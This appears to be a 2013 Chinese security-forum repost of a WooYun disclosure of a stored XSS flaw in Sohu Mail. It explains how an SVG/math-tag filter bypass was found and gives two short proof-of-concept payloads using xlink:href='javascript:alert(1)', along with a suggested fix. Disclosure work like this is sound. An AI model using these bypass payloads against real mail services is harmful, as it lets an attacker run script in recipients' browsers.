找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2159|回复: 0
打印 上一主题 下一主题

搜狐邮箱存储型XSS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-6 17:48:19 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:对某标签和某属性过滤不严导致可以在邮件中植入恶意代码- @! B( x3 ]% ]9 Z6 m
详细说明:按照老习惯通过支持html编辑的邮箱往目标邮箱海量发送xss vectors然后看漏了什么( S4 w+ I  e7 p" ?; M) e

* ~; h# h/ Y1 q: O( b2 u
/ i. i& \+ H. J可以看到我的svg被提前闭合了,rect里面的 width="1000" height="1000" fill="white"各种属性也和王力宏那首“你不在”一样,不见了。。不过貌似对于xlink:href没有过滤这是硬伤啊。接下来只要能让我插入math标签,这个问题基本上就算是解决了。: g' W; r  }6 x) K( @# s" ^
而事实上。。。确实就那样成功了8 ]0 m. N% b& Q
有效的payload如下:
  • <math><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)" target="_blank">abc q<rect></rect></a> </math>
    6 J# B/ b+ |. i' M
0 x" s7 n4 O' a4 N3 C
复制代码
- j+ j7 T- z# n8 [" d. T, v
当然也可以缩减一下,写成这样。
  • <math><a xlink:href=javascript:alert(1)>I'mshort
    ; r* C( @) L3 |7 x* {% W" k, i

- }. G. s; U% Y5 }5 f) I复制代码

' \1 @0 b; s* y2 Z2 G6 \漏洞证明:
4 b  H/ o( S, ]8 R' w- M8 Z, {
& c- K3 p% _9 X9 F: m
. h2 @9 p& [( }1 {0 u9 g
+ O4 C& I+ }7 h修复方案:对xlink:href的value进行过滤。8 z; \, p- [  @7 p

! r" e% U( o0 Z/ m8 H# B来源 mramydnei@乌云 0 e& ~7 l; H! t& O6 y9 j6 [0 T! h/ p

1 w5 R( {' a( _* O! @6 L: r% x
: ]$ L% [# V+ h" H4 y

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表